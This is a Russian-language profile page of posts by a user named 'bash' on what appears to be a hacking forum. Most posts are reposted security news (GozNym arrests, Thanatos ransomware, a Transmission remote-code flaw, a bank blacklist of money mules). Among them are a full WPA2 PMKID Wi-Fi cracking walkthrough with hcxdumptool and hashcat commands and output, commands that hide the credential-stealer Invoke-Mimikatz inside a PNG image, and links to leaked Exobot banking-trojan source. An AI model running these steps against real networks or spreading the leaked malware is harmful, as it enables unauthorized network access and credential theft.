Перейти к содержанию

bash

Пользователь
  • Публикаций

    30
  • Зарегистрирован

  • Посещение

Репутация

42 Excellent

Информация о bash

  • Звание
    Rank №2
  1. Центробанк опубликовал проект указания для всех операторов, занимающихся денежными переводами. Согласно новым правилам, они будут обязаны информировать регулятора о случаях, когда кто-то вывел или попытался вывести средства со счета без согласия клиента. Как поясняет газета «Коммерсант», это, вероятнее всего, приведет к созданию черного списка, в котором могут оказаться не только злоумышленники, но и добросовестные клиенты. Документ разработан в рамках нового закона 167-ФЗ, направленного на защиту банковских вкладов от хищений. Он вступает в силу 26 сентября и дает финансовым учреждениям право на два дня приостанавливать операции, если возникают подозрения в их неправомочности. Речь в данном случае идет о мошенниках, которые используют счета подставных лиц или специально созданных компаний (так называемых дропов) для снятия денег, украденных путем взлома банковских аккаунтов. Как следует из опубликованного документа, при обнаружении несанкционированных действий банки должны передать регулятору сведения о номере карты, электронного кошелька, мобильного телефона или счета получателя средств. ЦБ идентифицирует нарушителя, после чего распространит информацию о нем по всем кредитным организациям. В дальнейшем лицу, попавшему в черный список, ограничат возможность снимать наличные, совершать переводы и открывать новые счета. По замыслу авторов проекта, созданная таким образом база дропов позволит свести риски к минимуму. Однако некоторые эксперты считают, что идею необходимо доработать. По их мнению, следует предусмотреть процедуру реабилитации для добросовестных клиентов, которые попали в черный список случайно. Такое может случиться, например, в результате технической ошибки при переводе. Или же предпринимателя могут дискредитировать конкуренты, специально закинув ему на счет деньги и сообщив о взломе. Наконец, человек может просто не знать, что его счета используются в преступных целях. «Злоумышленники порой просят знакомых получить для них на свою карту деньги, при этом реальный получатель может и не подозревать, что они были похищены», — пояснил неназванный специалист по информационной безопасности одного из топ-50 российских банков. При этом закон не обязывает финансовые организации информировать держателя счета о том, что он попал в базу дропов. «Банк может на запрос клиента не сообщить о списке, назвав отключение ДБО или запрет на снятие наличных мерами, принимаемыми в рамках антиотмывочного законодательства», — пояснил «Коммерсанту» зампред правления «Ренессанс Кредита» Сергей Королев. Однако пресслужба Центробанка уверяет, что порядок занесения в базу дропов выстроят так, чтобы «максимально снизить риски» попадания туда по ошибке. Ранее ЦБ уже пытался составлять черный список получателей сомнительных платежей. В основу составления базы данных лег закон 115-ФЗ, который предусматривал ответственность за отмывание доходов, полученных преступным путем, и финансирование терроризма. Однако без жесткого контроля со стороны регулятора банки за 2017 год заблокировали около 500 тыс. счетов предпринимателей, которые попали в список из-за технических ошибок и обстоятельств, не связанных с нарушением закона. Впоследствии Центробанку пришлось разрабатывать специальный механизм для исключения добросовестных клиентов из черного списка отказников. Источник
  2. (ночной тариф Х2) , так понимаю время по UTC ?
  3. up Тоже интересует, когда заработает? " forum . exploit . in"
  4. В ходе международной операции, участие в которой принимали правоохранители нескольких стран, удалось обезвредить крупную киберпреступную группировку. По словам представителей Европола, среди участников группировки были граждане России. Киберпреступники отличались использованием вредоносной программы, получившей имя GozNym. С помощью этой программы злоумышленники пытались атаковать 41 тыс. жертв, у которых хотели похитить около $100 миллионов. Основными целями группировки стали различные бизнесмены и финансовые структуры. Для ликвидации преступной группы потребовалось участие правоохранительных органов Болгарии, Германии, Грузии, Молдавии, США и Украины. Как передает ТАСС, уголовные дела были инициированы в Грузии, Молдавии, США и Украине. В настоящее время пять граждан России, которые принимали участие в атаках группировки, разыскиваются Европолом. Трое из них непосредственно разрабатывали основной инструмент злоумышленников — GozNym. Двое оставшихся отвечали за отмывание денег, полученных незаконным путем. Источник: ttps://anti-malware.ru/news/2019-05-16-1447/29669?tg_rhash=24106b4601c277
  5. Нужен совет

    _ttps://ru.wikipedia.org/wiki/DiskCryptor _ttps://ru.wikipedia.org/wiki/VeraCrypt
  6. Social Mapper. использует распознавание лиц для того, чтобы находить людей в разных социальных сервисах. Что-то типа FindFace, только поддерживает 8 площадок: LinkedIn Facebook Twitter GooglePlus Instagram VKontakte Weibo Douban p.s. Авторы программы предупреждают, что поиск может занять значительное время и потребовать большой пропускной способности канала. Например, для обработки 1000 запросов утилите потребуется около 15 часов. GitHub
  7. Издание Bleeping Computer сообщило, что ИБ-специалист MalwareHunterTeam обнаружил нового шифровальщика Thanatos. Малварь отличает не только скверно написанный код и баги, из-за которых восстановить пользовательские данные, вероятно, невозможно вообще, но и тот факт, что это первый вымогатель принимающий выкупы в криптовалюте Bitcoin Cash. Исследователи пишут, что Thanatos – очередной яркий пример того, что вирусописатели все чаще выпускают «на рынок» плохо написанные и явно не прошедшие тестирование «продукты». Так, по данным независимого эксперта Франческо Мурони (Francesco Muroni), Thanatos шифрует каждый пользовательский файл отдельным ключом, изменяя их расширения на .THANATOS. Однако эти ключи не сохраняются буквально нигде. Фактически, даже если пострадавший заплатит разработчикам вымогателя выкуп, восстановить данные это никак не поможет. Спойлер Впрочем, изучая вредоноса, Мурони выразил надежду, что ключи шифрования для каждого файла теоретически можно подобрать с помощью обычного брутфорса, хотя этот процесс займет немало времени. Специалисты пишут, что пользователи, пострадавшие от Thanatos, могут обращаться за помощью на форум Bleeping Computer. Так как с технической точки зрения Thanatos не представляет особенного интереса для экспертов, они обращают внимание на тот факт, что авторы вымогателя принимают оплату в криптовалюте Bitcoin Cash, что делает Thanatos первой малварью такого рода. Жертвам шифровальщика на выбор предлагают три варианта для оплаты выкупа: 200 долларов США можно перевести на кошелек Bitcoin, Ethereum и Bitcoin Cash. Спойлер Хотя Ethereum тоже нельзя назвать популярной среди киберпреступников криптовалютой, этот метод оплаты все же встречался ранее. Так, авторы вымогателя HC7 , обнаруженного в начале 2018 года, тоже предлагали своим жертвам оплатить выкуп в Ethereum, невзирая на существование более анонимных криптовалют (например, Monero и DASH). Источник Исходники
  8. Exobot 2.5 Trump Edition слили

    https://dedik.cc/index.php?showtopi...5 trump edition https://dedik.cc/index.php?showtopic=140371
  9. dexguard у кого есть?

    _ttps://www.anti-malware.ru/news/2018-08-20-1447/27190 Поищи может найдёшь.
  10. Участниками проекта hashcat обнаружен новый вектор атаки на беспроводной стандарт WPA2, не требующий классического перехвата "рукопожатия" между клиентом и точкой доступа. Данная уязвимость выявлена в рамках исследования потенциальных проблем безопасности нового протокола WPA3. Основное отличие от существующих атак заключается в том, что в этой атаке захват полного 4-стороннего рукопожатия EAPOL не требуется. Новая атака выполняется в RSN IE (Robust Security Network Information Element), и для ее успешного воспроизведения достаточно одного кадра EAPOL. В настоящее время не известно, для какого количества маршрутизаторов этот метод будет работать, — вероятнее всего, для всех существующих сетей 802.11i /p/q/r с включенными функциями роуминга, а это большинство современных маршрутизаторов. Основные особенности новой атаки: нет необходимости ждать клиентов — атакуется напрямую AP; нет необходимости ждать полного 4-стороннего «рукопожатия» между клиентом и AP; отсутствие ретрансмиссии кадров EAPOL; исключает вероятность захвата неверных паролей от клиента; исключены потери кадров EAPOL при отдалении/потери связи с клиентом; высокая скорость, обусловленная отсутствием необходимости фиксировать значения nonce и replaycounter; нет необходимости в специализированном формате выходных данных (pcap, hccapx и т. д.) — захваченные данные хранятся в виде hex-строки. Детали атаки RSN IE — это необязательное поле, которое можно найти в рамках управления 802.11. Одной из возможностей RSN является PMKID. Спойлер PMKID вычисляется с использованием HMAC-SHA1, где ключ является PMK, а часть данных представляет собой конкатенацию фиксированной строковой метки «PMK Name», MAC-адрес точки доступа и MAC-адрес станции. Спойлер PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA) Поскольку PMK такой же, как в обычном четырехстороннем рукопожатии EAPOL, это идеальный вектор атаки. Мы получаем все необходимые данные в первом кадре EAPOL из AP. Для атаки потребуются следующие инструменты (актуальные версии): hcxdumptool hcxtools hashcat Запускаем hcxdumptool для "снятия" PMKID: Спойлер $ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status start capturing (stop with ctrl+c) INTERFACE:...............: wlp39s0f3u4u5 FILTERLIST...............: 0 entries MAC CLIENT...............: 89acf0e761f4 (client) MAC ACCESS POINT.........: 4604ba734d4e (start NIC) EAPOL TIMEOUT............: 20000 DEAUTHENTICATIONINTERVALL: 10 beacons GIVE UP DEAUTHENTICATIONS: 20 tries REPLAYCOUNTER............: 62083 ANONCE...................: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69 Об успешном завершении атаки (средняя продолжительность 10 минут) уведомит надпись FOUND PMKID: Спойлер [13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e [ASSOCIATIONREQUEST, SEQUENCE 4][13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206] [13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID] После чего необходимо сконвертировать полученные данные: Спойлер $ ./hcxpcaptool -z test.16800 test.pcapng start reading from test.pcapng summary: -------- file name....................: test.pcapng file type....................: pcapng 1.0 file hardware information....: x86_64 file os information..........: Linux 4.17.11-arch1 file application information.: hcxdumptool 4.2.0 network type.................: DLT_IEEE802_11_RADIO (127) endianess....................: little endian read errors..................: flawless packets inside...............: 66 skipped packets..............: 0 packets with FCS.............: 0 beacons (with ESSID inside)..: 17 probe requests...............: 1 probe responses..............: 11 association requests.........: 5 association responses........: 5 authentications (OPEN SYSTEM): 13 authentications (BROADCOM)...: 1 EAPOL packets................: 14 EAPOL PMKIDs.................: 1 1 PMKID(s) written to test.16800 которые после конвертации примут следующий вид: 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60 eb603a39f3a представляющие из себя hex-значения следующих типов данных: PMKID*MAC AP*MAC Station*ESSID Далее остается "скормить" полученные результаты утилите hashcat (да, без брута пока никуда) и ждать результат: $ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!' Данная техника значительно упрощает и ускоряет атаку на большинство беспроводных устройств благодаря меньшему количеству факторов влияния. P.S.: эта уязвимость в большей степени затрагивает домашние/SOHO-устройства, в корпоративном сегменте, как правило, используется более надежный MGT WPA2 Enterprise с RADIUS-ключами. Источник
  11. Печалька :( , репа нужна , в лс ответь, есть вопрос.
  12. Разработчик Баретт Адамс в своёмGitHub-репозитории опубликовал инструмент, позволяющий встраивать скрипт PowerShell в изображения. Invoke-PSImage вставляет байты информации в пиксели картинки формата PNG. После встраивания возможно сгенерировать oneliner либо напрямую из файла, либо по Сети. Встраивание скрипта в изображение Инструмент использует наименее значимые 4 бита двух значений цвета каждого пикселя для хранения полезной информации. Разумеется, качество изображения страдает, но оно по-прежнему выглядит прилично. Инструмент в качестве входных данных принимает большинство форматов изображений, но результатом всегда будет PNG. Новое изображение в дальнейшем может быть сжато без потерь, а также без ущерба для выполнения полезной нагрузки, поскольку данные хранятся в самих цветах. По словам Адамса, каждый пиксель изображения используется для хранения одного байта скрипта. Поэтому для полноценной работы инструмента необходимо подобрать изображение с тем же количеством пикселей, что и байтов в скрипте. Например, для PS-скрипта Invoke-Mimikatz подойдёт изображение с разрешением 1920×1200. Аргументы инструмента Спойлер -Script [filepath] — путь к скрипту для встраивания; -Image [filepath] — путь к картинке для встраивания; -Out [filepath] — путь к результирующему файлу; -Web — флаг, указывающий, что картинка для встраивания находится в веб. Необходимо также указать её URL. Пример использования Первый пример создаёт картинку со встроенным скриптом Invoke-Mimikatz.ps1. Результирующим файлом будет oneliner для запуска с диска: Спойлер PS>Import-Module .\Invoke-PSImage.ps1PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\kiwi.jpg -Out .\evil-kiwi.png [Oneliner to execute from a file] Следующий пример кода создаст картинку со встроенным скриптом Invoke-Mimikatz.ps1. Результирующим файлом будет oneliner для запуска из веб: Спойлер PS>Import-Module .\Invoke-PSImage.ps1PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\kiwi.jpg -Out .\evil-kiwi.png -Web [Oneliner to execute from the web] © Копирайт https://tproger.ru/news/invoke-psimage/
  13. Проэксплуатировав проблему, злоумышленник может получить контроль над ПК пользователя. В популярном BitTorrent-клиенте Transmission обнаружена опасная уязвимость (CVE-2018-5702), позволяющая злоумышленникам удаленно выполнить произвольный код и получить доступ к компьютерам пользователей. Как полагает специалист команды Google Project Zero Тэвис Орманди (Tavis Ormandy), проблема может затрагивать и другие клиенты BitTorrent. Наряду с подробным описанием уязвимости, Орманди опубликовал PoC-код атаки. Она базируется на функции Transmission, позволяющей управлять клиентом BitTorrent через браузер. Как пояснил исследователь, большинство пользователей не устанавливают парольную защиту, поскольку полагают, что доступ к JSON RPC интерфейсу может контролировать только тот, у кого есть физический доступ к компьютеру, на котором работает Transmission. Используя технику DNS rebinding (Anti DNS Pinning), Орманди разработал метод управления интерфейсом Transmission при посещении жертвой вредоносного сайта. Эксплоит был успешно протестирован в браузерах Chrome и FireFox на системах Windows и Linux. Помимо прочего, атакующий может изменить папку загрузки в Transmission на домашнюю папку пользователя и заставить приложение загрузить торрент-файл .bashrc, который будет исполняться автоматически при каждом запуске командной оболочки Bash. Злоумышленник также может удаленно изменить настройки Transmission и выполнить любую команду после завершения загрузки. Уязвимость довольно легко проэксплуатировать, отметил эксперт. Орманди проинформировал разработчиков о проблеме в конце ноября 2017 года, при этом он включил в отчет уже готовый патч. Однако авторы Transmission пока так и не выпустили официальное обновление, в связи с чем исследователь решил раскрыть информацию об уязвимости раньше отведенного 90-дневного срока. Как пояснил представитель Transmission, официальный патч планируется выпустить «в ближайшее время». Сроки выхода обновления не указываются. По словам разработчика, уязвимость проявляется только в том случае, если пользователи разрешают удаленный доступ и отключают парольную защиту. Anti DNS Pinning (DNS rebinding) – атака, позволяющая злоумышленнику манипулировать соответствием между IP-адресом и DNS-именем узла (FQDN) с целью запуска активного содержимого в контексте безопасности уязвимого сайта. Используя эту технику, атакующий может использовать браузер жертвы для получения доступа к защищенным сайтам (например, находящимся за межсетевыми экранами или требующим аутентификации). (с) Копирайт https://www.securitylab.ru/news/490798.php
×